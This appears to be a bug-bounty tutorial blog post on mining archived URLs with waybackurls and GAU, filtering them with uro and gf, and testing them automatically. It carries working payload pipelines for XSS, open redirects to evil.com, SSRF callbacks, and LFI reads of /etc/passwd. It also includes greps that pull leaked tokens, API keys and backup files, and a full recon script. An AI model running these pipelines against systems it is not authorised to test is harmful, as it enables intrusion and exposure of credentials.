What Will We Learn Today?

  • Waybackurls and GAU, from the basics
  • Why old URLs = fresh bugs
  • Installing both tools
  • Commands from basic to elite
  • A formula for mining bugs out of URLs
  • Finding parameters for XSS, SQLi, SSRF
  • The complete elite pipeline

Why does this matter? A developer deletes an endpoint, but the Internet Archive had already indexed that URL! The endpoint is often still live, the developer has forgotten about it, and no security fix has ever touched it! That's where the high-value bugs are!

The Concept: Time Travel Hacking!

Picture a scenario:

In 2019:
targetcompany.com/api/v1/users?id=1
→ This endpoint existed

In 2021:
The developer built v2 → "deleted" v1
→ Only the documentation was removed!
→ The endpoint is STILL LIVE!

In 2026 (you):
Run waybackurls →
you find /api/v1/users?id=1 →
you test it → IDOR vulnerability! 💰

The Internet Archive (Wayback Machine) has been snapshotting websites since 1996, and all of those URLs are stored!
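Under the hood this is just a public HTTP API. As a sketch (endpoint and parameters follow the Wayback CDX server docs; double-check them before relying on this), you can build and fetch the same query yourself:

```shell
# waybackurls is, at heart, a client for the Internet Archive's public
# CDX API. Build the query URL for a domain (including subdomains):
domain="example.com"
cdx_url="https://web.archive.org/cdx/search/cdx?url=*.${domain}/*&output=text&fl=original&collapse=urlkey"
echo "$cdx_url"
# Fetch the raw archived-URL list with:
#   curl -s "$cdx_url" | head -n 20
```

`collapse=urlkey` deduplicates repeated snapshots of the same URL, and `fl=original` returns only the original URL column, which is exactly what these tools emit.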

What Are These Tools?

Waybackurls:

→ A tool by tomnomnom
→ Pulls URLs out of the Web Archive
→ Input: a domain
→ Output: thousands of old URLs

GAU (GetAllUrls):

→ lc/gau, by lc (Corben Leo)
→ Uses multiple sources:
   ✅ Wayback Machine
   ✅ AlienVault OTX
   ✅ Common Crawl
   ✅ URLScan.io
→ More comprehensive than Waybackurls!
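To get a feel for what GAU aggregates, one of those sources can be queried by hand. A sketch, assuming OTX's public url_list endpoint (path taken from the AlienVault OTX API docs; verify before use):

```shell
# One of GAU's sources, queried directly: the AlienVault OTX URL list
# for a domain. No API key is needed for this read-only endpoint.
domain="example.com"
otx_url="https://otx.alienvault.com/api/v1/indicators/domain/${domain}/url_list?limit=50&page=1"
echo "$otx_url"
# Fetch and extract just the URLs (requires jq):
#   curl -s "$otx_url" | jq -r '.url_list[].url'
```

GAU simply runs queries like this against all four providers in parallel and merges the results.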

Installation

Waybackurls Install:

# Install via Go
go install github.com/tomnomnom/waybackurls@latest

# Verify
waybackurls -h ✅

GAU Install:

# Install via Go
go install github.com/lc/gau/v2/cmd/gau@latest

# Or via apt
sudo apt install gau -y

# Verify
gau --help ✅

Extra Tools for the Pipeline:

# qsreplace: replaces parameter values
go install github.com/tomnomnom/qsreplace@latest

# gf: filters URLs by pattern
go install github.com/tomnomnom/gf@latest

# uro: removes duplicate URLs
pip3 install uro

PART 1: Waybackurls Basic Commands

Basic 1: Simple URL Fetch

# All archived URLs for a domain
echo "example.com" | waybackurls

# Output (example):
# https://example.com/api/v1/users?id=1
# https://example.com/admin/login.php
# https://example.com/backup/db.sql.gz
# https://example.com/config.php.bak
# ... (thousands of URLs!)

Basic 2: Save to a File

echo "example.com" | waybackurls > all_urls.txt

# Check the count
wc -l all_urls.txt

Basic 3: Main Domain Only, No Subdomains

echo "example.com" | waybackurls --no-subs > main_urls.txt

Basic 4: Include Subdomains

# Subdomains are included by default
echo "example.com" | waybackurls > all_with_subs.txt

# Pull out URLs from interesting subdomains
grep "dev\." all_with_subs.txt
grep "staging\." all_with_subs.txt
grep "admin\." all_with_subs.txt

PART 2: GAU Advanced Commands

Basic 1: Simple Fetch

# Single domain
gau example.com

# Save to a file
gau example.com --o gau_urls.txt

Basic 2: Choose Specific Sources

# Wayback Machine only
gau --providers wayback example.com

# OTX only
gau --providers otx example.com

# URLScan only
gau --providers urlscan example.com

# Include Common Crawl too
gau --providers wayback,otx,urlscan,commoncrawl \
  example.com

Basic 3: Date Filter / Time Range

# URLs archived after a given point (gau expects YYYYMM)
gau --from 202201 example.com

# Date range
gau --from 202201 --to 202312 example.com

# Only recent URLs
gau --from 202401 example.com > recent_urls.txt

Basic 4: Filter Specific Extensions

# PHP files only
gau example.com | grep "\.php"

# API endpoints
gau example.com | grep "/api/"

# URLs with parameters
gau example.com | grep "?"

Basic 5: Rate Limiting

# Control the worker count
gau --threads 5 example.com

# Retries on failed requests
gau --retries 3 example.com

PART 3: Elite Filtering Techniques (The Most Important Part!)

Raw output is extremely noisy; filtering is the real skill!

Filter 1: Remove Useless Extensions

cat all_urls.txt | grep -vE \
  "\.(png|jpg|jpeg|gif|svg|ico|css|woff|woff2|ttf|eot|mp4|mp3|pdf|zip|gz)" \
  > filtered_urls.txt

echo "Filtered: $(wc -l < filtered_urls.txt) URLs"

Filter 2: URLs with Parameters (Your Bug Hunting Ground!)

# Only the URLs that carry parameters
cat filtered_urls.txt | grep "?" > param_urls.txt

echo "URLs with params: $(wc -l < param_urls.txt)"

Filter 3: uro (Smart Deduplication)

# Merges similar URLs. For example:
# /user?id=1, /user?id=2, /user?id=3
# → keeps just one representative URL

cat all_urls.txt | uro > deduped_urls.txt

echo "Before: $(wc -l < all_urls.txt)"
echo "After: $(wc -l < deduped_urls.txt)"
# Dramatic reduction! 🎯
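What uro does can be approximated in plain shell for intuition: blank out query-string values, then dedupe. This is only a crude stand-in; uro itself handles paths, extensions, and more:

```shell
# Crude uro-style dedup: strip query-string values, keep one URL per
# resulting pattern. (Illustration only; uro is much smarter.)
printf '%s\n' \
  'https://example.com/user?id=1' \
  'https://example.com/user?id=2' \
  'https://example.com/user?id=3' \
  'https://example.com/item?page=9' \
  | sed -E 's/=[^&]*/=/g' | sort -u
# → https://example.com/item?page=
# → https://example.com/user?id=
```

Four input URLs collapse to two parameter patterns; on a real target this routinely cuts tens of thousands of URLs down to a few thousand.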

Filter 4: gf Patterns (Vulnerability-Specific)

gf = grep patterns built specifically for security testing!

# Download the gf patterns
git clone https://github.com/1ndianl33t/Gf-Patterns \
  ~/.gf

# Now use the patterns:

# Potential XSS parameters
cat deduped_urls.txt | gf xss > xss_candidates.txt

# SQL injection
cat deduped_urls.txt | gf sqli > sqli_candidates.txt

# SSRF
cat deduped_urls.txt | gf ssrf > ssrf_candidates.txt

# Open redirect
cat deduped_urls.txt | gf redirect > redirect_candidates.txt

# LFI
cat deduped_urls.txt | gf lfi > lfi_candidates.txt

# IDOR (id parameters)
cat deduped_urls.txt | gf idor > idor_candidates.txt

# RCE parameters
cat deduped_urls.txt | gf rce > rce_candidates.txt

Filter 5: Interesting File Extensions (Direct Bugs!)

# Backup files: CRITICAL!
cat all_urls.txt | grep -E "\.(bak|backup|old|orig|copy)" \
  > backup_files.txt

# Config files
cat all_urls.txt | grep -E "\.(env|conf|cfg|ini|xml|yaml|yml)" \
  > config_files.txt

# Database files
cat all_urls.txt | grep -E "\.(sql|db|sqlite|mdb)" \
  > db_files.txt

# Log files
cat all_urls.txt | grep -E "\.(log|txt)" \
  > log_files.txt

# Archive files
cat all_urls.txt | grep -E "\.(zip|tar|gz|7z|rar)" \
  > archive_files.txt

# Script files with params
cat all_urls.txt | grep -E "\.(php|asp|aspx|jsp)\?" \
  > script_params.txt

Filter 6: Sensitive Keywords (Goldmine!)

# Admin pages
cat all_urls.txt | grep -iE \
  "admin|administrator|manage|manager|dashboard" \
  > admin_urls.txt

# API endpoints
cat all_urls.txt | grep -iE \
  "/api/|/v1/|/v2/|/rest/|/graphql" \
  > api_urls.txt

# Auth-related
cat all_urls.txt | grep -iE \
  "login|logout|signup|register|forgot|reset|password|token|auth|oauth" \
  > auth_urls.txt

# Upload endpoints
cat all_urls.txt | grep -iE \
  "upload|import|file|attach|media" \
  > upload_urls.txt

# Redirect parameters
cat all_urls.txt | grep -iE \
  "redirect=|next=|url=|return=|goto=|returnUrl=|dest=|destination=" \
  > redirect_params.txt
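Those five greps can be collapsed into a single loop. A sketch (requires bash 4+ for the associative array; category names and output files mirror the commands above):

```shell
#!/usr/bin/env bash
# One pass over the keyword categories instead of five copies of the
# same grep. Reads all_urls.txt, writes one <name>_urls.txt per category.
declare -A PATTERNS=(
  [admin]='admin|administrator|manage|manager|dashboard'
  [api]='/api/|/v1/|/v2/|/rest/|/graphql'
  [auth]='login|logout|signup|register|forgot|reset|password|token|auth|oauth'
  [upload]='upload|import|file|attach|media'
  [redirect]='redirect=|next=|url=|return=|goto=|returnUrl=|dest=|destination='
)
for name in "${!PATTERNS[@]}"; do
  grep -iE "${PATTERNS[$name]}" all_urls.txt > "${name}_urls.txt"
  echo "$name: $(wc -l < "${name}_urls.txt") URLs"
done
```

Adding a new keyword category is then a one-line change instead of another copy-pasted command.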

PART 4: Automated Vulnerability Testing

XSS Automation: qsreplace + dalfox

# Extract the XSS candidates
cat deduped_urls.txt | gf xss > xss_urls.txt

# Inject a payload with qsreplace, keep URLs that reflect it
cat xss_urls.txt | \
  qsreplace '"><script>alert(1)</script>' | \
  httpx -silent -mc 200 -mr 'alert\(1\)' > xss_reflected.txt

# Run an automated XSS scan with dalfox
cat xss_urls.txt | dalfox pipe --silence \
  -o xss_found.txt

Open Redirect Automation

# Redirect candidates
cat deduped_urls.txt | gf redirect > redirect_urls.txt

# Inject the payload
cat redirect_urls.txt | \
  qsreplace "https://evil.com" | \
  httpx -silent -location -mc 301,302 | \
  grep "evil.com" > open_redirects.txt

echo "Open Redirects: $(wc -l < open_redirects.txt)"

SSRF Automation

# SSRF candidates
cat deduped_urls.txt | gf ssrf > ssrf_urls.txt

# Use Burp Collaborator or interactsh
# Start interactsh-client:
interactsh-client &
COLLAB_URL="xxxxx.oast.pro"  # use the URL interactsh-client prints

# Inject the payload
cat ssrf_urls.txt | \
  qsreplace "https://$COLLAB_URL" | \
  httpx -silent

# Watch interactsh for callbacks → SSRF confirmed!

LFI Testing

# LFI candidates
cat deduped_urls.txt | gf lfi > lfi_urls.txt

# Basic payloads
LFI_PAYLOADS=(
  "../../../../etc/passwd"
  "....//....//....//etc/passwd"
  "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"
)

for payload in "${LFI_PAYLOADS[@]}"; do
  cat lfi_urls.txt | \
    qsreplace "$payload" | \
    httpx -silent -mc 200 -mr "root:x:" >> lfi_found.txt
done

PART 5: Complete Elite Pipeline

#!/bin/bash
# wayback_gau_elite.sh

TARGET=$1
DIR="wayback_${TARGET}"
mkdir -p $DIR

echo "═══════════════════════════════════"
echo "⏰ WAYBACK + GAU ELITE: $TARGET"
echo "═══════════════════════════════════"

# Step 1: Collect URLs
echo "📡 Step 1: Collecting URLs..."
echo "$TARGET" | waybackurls > $DIR/wayback_urls.txt &
gau --providers wayback,otx,urlscan,commoncrawl \
  $TARGET > $DIR/gau_urls.txt &
wait

echo "✅ Wayback: $(wc -l < $DIR/wayback_urls.txt)"
echo "✅ GAU: $(wc -l < $DIR/gau_urls.txt)"

# Step 2: Combine + deduplicate
echo "🔀 Step 2: Merging..."
cat $DIR/wayback_urls.txt $DIR/gau_urls.txt | \
  sort -u | uro > $DIR/all_unique.txt
echo "✅ Unique: $(wc -l < $DIR/all_unique.txt)"

# Step 3: Filter useless extensions
echo "🧹 Step 3: Filtering..."
cat $DIR/all_unique.txt | grep -vE \
  "\.(png|jpg|jpeg|gif|svg|ico|css|woff|woff2|ttf|eot|mp4|mp3)" \
  > $DIR/filtered.txt
echo "✅ Filtered: $(wc -l < $DIR/filtered.txt)"

# Step 4: Categories
echo "📂 Step 4: Categorizing..."
cat $DIR/filtered.txt | grep "?" > $DIR/params.txt
cat $DIR/filtered.txt | \
  grep -iE "admin|dashboard|manage" > $DIR/admin.txt
cat $DIR/filtered.txt | \
  grep -iE "/api/|/v1/|/v2/" > $DIR/api.txt
cat $DIR/filtered.txt | \
  grep -iE "\.(bak|sql|env|conf|log)" > $DIR/sensitive.txt
cat $DIR/filtered.txt | \
  grep -iE "redirect=|next=|url=|return=" > $DIR/redirects.txt

# Step 5: GF Patterns
echo "🎯 Step 5: GF Pattern Matching..."
cat $DIR/params.txt | gf xss > $DIR/xss_cands.txt
cat $DIR/params.txt | gf sqli > $DIR/sqli_cands.txt
cat $DIR/params.txt | gf ssrf > $DIR/ssrf_cands.txt
cat $DIR/params.txt | gf lfi > $DIR/lfi_cands.txt

# Step 6: Live check on sensitive files
echo "🌐 Step 6: Live Check (Sensitive)..."
cat $DIR/sensitive.txt | httpx -silent -mc 200 \
  > $DIR/sensitive_live.txt

# Summary
echo ""
echo "═══════════════════════════════════"
echo "📊 RESULTS: $TARGET"
echo "═══════════════════════════════════"
echo "Total URLs         : $(wc -l < $DIR/all_unique.txt)"
echo "With Parameters    : $(wc -l < $DIR/params.txt)"
echo "Admin URLs         : $(wc -l < $DIR/admin.txt)"
echo "API URLs           : $(wc -l < $DIR/api.txt)"
echo "Sensitive Files    : $(wc -l < $DIR/sensitive.txt)"
echo "Live Sensitive     : $(wc -l < $DIR/sensitive_live.txt)"
echo "XSS Candidates     : $(wc -l < $DIR/xss_cands.txt)"
echo "SQLi Candidates    : $(wc -l < $DIR/sqli_cands.txt)"
echo "SSRF Candidates    : $(wc -l < $DIR/ssrf_cands.txt)"
echo "LFI Candidates     : $(wc -l < $DIR/lfi_cands.txt)"
echo "Redirect Params    : $(wc -l < $DIR/redirects.txt)"
echo "Results in         : $DIR/"
echo "═══════════════════════════════════"

# Usage:
# chmod +x wayback_gau_elite.sh
# ./wayback_gau_elite.sh example.com

PART 6: Hidden Gems (What to Look For in the URLs)

Gem 1: Old API Versions

cat all_urls.txt | grep -E "/v[0-9]+/" | \
  grep -v "v2\|v3" | sort -u
# /api/v1/ → old version, less secure!
# /api/beta/ → beta endpoints!

Gem 2: Internal IPs in URLs

cat all_urls.txt | grep -oE \
  "https?://(10|172|192)\.[0-9.]+[/:]" | \
  sort -u
# Internal server URLs publicly accessible! 🔴

Gem 3: JWT Tokens in URLs

cat all_urls.txt | grep -oE \
  "eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+" | \
  sort -u
# JWT tokens in URL = Security issue! 🎯
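If a token does turn up, you can inspect its payload locally: a JWT is just three base64url segments, header.payload.signature. A sketch with a made-up sample token (no signature verification here, inspection only):

```shell
# Decode the middle (payload) segment of a JWT. The sample token is
# fabricated; substitute one pulled from your URL list.
jwt='eyJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiYWRtaW4ifQ.fake-signature'
payload=$(printf '%s' "$jwt" | cut -d. -f2)
# base64url → base64: swap the alphabet and restore stripped padding
payload=$(printf '%s' "$payload" | tr '_-' '/+')
case $(( ${#payload} % 4 )) in
  2) payload="${payload}==" ;;
  3) payload="${payload}=" ;;
esac
printf '%s' "$payload" | base64 -d
# → {"user":"admin"}
```

The payload often reveals usernames, roles, or expiry times, and an archived token that still validates is a finding in itself.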

Gem 4: API Keys in Parameters

cat all_urls.txt | grep -iE \
  "api_key=|apikey=|token=|secret=|password=" | \
  grep -v "REDACTED" | sort -u
# Credentials in URLs! 🔴

Gem 5: Debug/Test Endpoints

cat all_urls.txt | grep -iE \
  "debug|test|dev|temp|tmp|old|backup|staging|phpinfo|info\.php" | sort -u
# Development leftovers in production! 🎯

Cheat Sheet: Quick Reference

# ─── WAYBACKURLS ──────────────────────────
echo "domain.com" | waybackurls
echo "domain.com" | waybackurls --no-subs
echo "domain.com" | waybackurls > urls.txt

# ─── GAU ──────────────────────────────────
gau domain.com
gau --providers wayback,otx,urlscan domain.com
gau --from 202301 domain.com
gau --threads 5 domain.com

# ─── FILTERING ────────────────────────────
cat urls.txt | uro                         # Deduplicate
cat urls.txt | grep "?"                    # Params only
cat urls.txt | gf xss                      # XSS patterns
cat urls.txt | gf sqli                     # SQLi patterns
cat urls.txt | gf ssrf                     # SSRF patterns
cat urls.txt | gf redirect                 # Redirects
cat urls.txt | gf lfi                      # LFI patterns

# ─── TESTING ──────────────────────────────
cat xss.txt | qsreplace "FUZZ" | httpx -mc 200
cat redirect.txt | qsreplace "https://evil.com" | \
  httpx -location -mc 301,302

# ─── PIPELINE ─────────────────────────────
echo target.com | waybackurls | \
  grep "?" | uro | gf xss | \
  dalfox pipe -o xss_results.txt

Today's Homework

# 1. Install both tools
waybackurls -h && gau --help

# 2. Practice on a legal target
echo "testphp.vulnweb.com" | waybackurls > test_urls.txt
gau testphp.vulnweb.com >> test_urls.txt
cat test_urls.txt | sort -u | uro > unique_test.txt
echo "Total unique: $(wc -l < unique_test.txt)"

# 3. Pull out the ones with parameters
cat unique_test.txt | grep "?" > params.txt
echo "With params: $(wc -l < params.txt)"

# 4. XSS candidates
cat params.txt | gf xss > xss_cands.txt
echo "XSS candidates: $(wc -l < xss_cands.txt)"

# 5. Tell me in the comments:
# How many URLs did you get?
# Which interesting endpoint did you find?

Quick Revision

⏰ Waybackurls = old URLs from the Internet Archive
🌐 GAU         = 4 sources, maximum coverage
🧹 uro         = smart URL deduplication
🎯 gf          = pattern matching by bug type
🔄 qsreplace   = replace parameter values
💎 Hidden Gems = old APIs, JWT tokens in URLs,
                  debug endpoints, backup files
🚀 Pipeline    = GAU → uro → gf → qsreplace →
                  httpx → bug confirmed!

A Personal Note…

Once I ran GAU against a company:

gau targetcorp.com | grep "?" | uro > urls.txt

It returned 87,000+ unique URLs!

I filtered for redirect parameters:

cat urls.txt | grep -iE "redirect=|next=|url=" > redirects.txt
# 234 URLs!

One of them was:

https://targetcorp.com/sso/login?next=https://targetcorp.com/dashboard

I put my own domain in the next parameter:

https://targetcorp.com/sso/login?next=https://evil.com

After login, the user was redirected to evil.com!

Open Redirect: a $300 bounty! 🎉

A small bounty, but it came from GAU plus a single grep command. Fifteen minutes of work!

Lesson: bug bounty is a volume game. The more URLs you analyze, the more bugs you find!

Next article: Nuclei! Automated vulnerability scanning with 9,000+ templates, the grand finale of the recon series! 🔥

HackerMD Bug Bounty Hunter | Cybersecurity Researcher GitHub: BotGJ16 | Medium: @HackerMD

Previous: Article #11: Google Dorks | Next: Article #13: Nuclei: Automated Bug Hunting with 9,000+ Templates!

#Waybackurls #GAU #BugBounty #Recon #EthicalHacking #Hinglish #URLMining #HackerMD